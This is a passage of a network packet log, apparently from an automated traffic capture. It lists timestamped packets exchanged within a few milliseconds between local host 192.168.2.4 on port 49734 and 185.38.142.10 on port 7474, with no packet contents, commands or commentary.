Jun 28, 2024 08:58:04.822964907 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.822966099 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.822977066 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.822985888 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.822994947 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823004007 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823015928 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823033094 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.823079109 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823082924 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.823090076 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823101044 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823118925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823127985 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823131084 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.823132038 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823137999 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823154926 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823194981 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823199987 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.823204994 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.823216915 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.823251009 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826453924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826505899 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826603889 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826617002 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826699972 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826710939 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826720953 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826730013 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826839924 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826875925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826888084 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826896906 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826906919 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826915979 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826925993 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826932907 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826936007 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826946974 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826965094 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826966047 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826977015 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826984882 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.826987028 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.826996088 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827002048 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827018023 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827033043 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827037096 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827044010 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827059031 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827097893 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827416897 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827428102 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827470064 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827610970 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827642918 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827653885 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827658892 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827681065 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827688932 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827713013 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827728987 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827733994 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827745914 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827791929 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827792883 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827804089 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827814102 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827825069 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827842951 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827843904 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827871084 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827891111 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827896118 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827903986 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827907085 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827910900 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827934027 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.827960014 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827970982 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.827987909 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828007936 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828018904 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828032970 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828056097 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828069925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828080893 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828084946 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828092098 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828104973 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828114033 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828157902 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828159094 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828171015 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828180075 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828191042 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828211069 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828223944 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828227043 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828238964 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828258038 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828288078 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828324080 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828335047 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828342915 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828358889 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828368902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828381062 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828381062 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828417063 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828444958 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828455925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828464031 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828488111 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828505039 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828515053 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828515053 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828556061 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828588963 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828600883 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828609943 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828620911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828639984 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828649044 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828649998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828666925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828674078 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828704119 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828708887 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828711987 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828725100 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828728914 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828788042 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828788042 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828799963 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828809977 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828844070 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828860998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828871965 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828876972 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828881025 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828888893 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828908920 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828929901 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828941107 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828952074 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.828952074 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828964949 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828984976 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.828994989 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829014063 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829036951 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829041004 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829047918 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829075098 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829087973 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829103947 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829118967 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829148054 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829165936 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829175949 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829185009 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829205036 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829215050 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829221964 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829241991 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829243898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829274893 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829288960 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829293013 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829299927 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829319954 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829339027 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829359055 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829369068 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829372883 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829386950 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829405069 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829415083 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829447031 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829457998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829474926 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829480886 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829487085 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829509020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829509974 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829538107 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829580069 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829591036 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829598904 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829607964 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829627037 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829627991 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829639912 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829649925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829668045 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829672098 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829694986 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829727888 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829772949 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829783916 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829801083 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829811096 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829830885 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829852104 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829883099 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829894066 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829901934 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829922915 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829932928 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829936028 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829943895 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829952955 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.829971075 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829982042 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.829988003 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.830010891 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.830022097 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.830039978 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.830065966 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831314087 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831363916 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831381083 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831428051 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831860065 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831871033 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831880093 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831890106 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831914902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831918001 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831926107 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831937075 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831938982 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831947088 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831957102 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.831969023 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.831988096 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832005978 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832045078 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832056046 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832066059 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832075119 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832083941 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832093000 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832097054 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832103014 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832113028 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832122087 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832123041 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832133055 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832137108 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832144976 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832158089 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832165956 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832176924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832185030 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832195044 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832196951 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832205057 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832216024 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832218885 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832235098 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832246065 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832248926 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832257032 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832264900 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832268000 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832278967 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832288980 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832297087 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832298040 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832319021 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832329988 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832330942 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832341909 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832350969 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832353115 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832370043 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832375050 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832386017 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832395077 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832405090 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832408905 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832416058 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832426071 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832432985 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832447052 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832456112 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832458973 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832468987 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832470894 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832490921 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832508087 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832516909 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832519054 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832529068 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832539082 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832547903 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832557917 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832575083 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832592010 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832598925 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832603931 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832634926 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832647085 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832684040 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832778931 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832789898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832799911 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832820892 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832829952 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832839012 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832839966 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832859993 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832870007 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832879066 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832879066 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832891941 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832892895 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832901955 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832912922 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.832923889 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:04.832952023 CEST	7474	49734	185.38.142.10	192.168.2.4
